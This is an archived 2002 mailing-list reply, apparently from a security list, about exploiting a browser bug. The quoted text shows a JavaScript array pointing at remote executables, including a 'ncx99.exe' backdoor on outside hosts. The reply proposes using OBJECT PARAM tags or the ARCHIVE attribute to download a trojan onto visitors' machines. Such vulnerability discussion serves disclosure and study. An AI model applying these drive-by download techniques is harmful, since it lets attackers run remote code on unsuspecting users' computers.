Hello ... What about, generally, not tackling the programName array trying to stuff params into it, but the <OBJECT> instead? At 17:48 14.03.02 -0500 you wrote: ->Another thought... will this bug run an executable from a web page? If ->so you could just make your own binary to do whatever you wanted. Like ->http://mysiteathome.com/malware.exe or something along those lines. I ->would HOPE that it asks to save the file to disk or even better ignore ->it all together. Maybe try something like: -> ->var programName=new Array( -> 'http://mysiteathome.com/ncx99.exe', -> 'http://someothersite.com/ncx99.exe', ->); One could maybe try the <PARAM NAME=> - tag to pass parameters. Dunno how that's transported to the object, though. Another attempt might be using the ARCHIVE - attribute of the OBJECT to download the trojan (or batchfile if you will, like has been proposed here), so you don't need params. greetings, -jo
This archive was generated by hypermail 2b30 : Fri Mar 15 2002 - 08:03:43 PST